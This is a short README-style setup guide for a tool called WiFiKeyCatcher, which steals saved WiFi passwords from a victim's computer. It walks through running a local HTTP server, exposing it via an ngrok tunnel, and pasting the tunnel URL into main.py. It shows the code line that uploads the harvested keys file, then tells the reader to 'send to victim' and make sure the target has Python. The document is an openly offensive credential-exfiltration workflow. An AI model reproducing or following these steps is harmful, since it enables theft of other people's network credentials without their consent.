- Clone this repository:
$ git clone https://github.com/ibnaleem/WiFiKeyCatcher.git
- Run
HTTPServer
:
$ py -m http.server
- Install ngrok
- Configure auth-token in terminal:
$ ngrok config add-authtoken <token>
- Start tunnel on port 8000:
$ ngrok http 8000
If successful, you should see all of your system directories as embeded links.
- Copy ngrok URL and paste into
main.py
(line 52):
url = "https://ngrok-url-here"
files = {'file': open(f'{curr_path}.txt', 'rb')}
Save and send to victim. Note: ngrok must be running to obtain WiFi-Keys
Make sure your target has Python installed, and you're running HTTP server + ngrok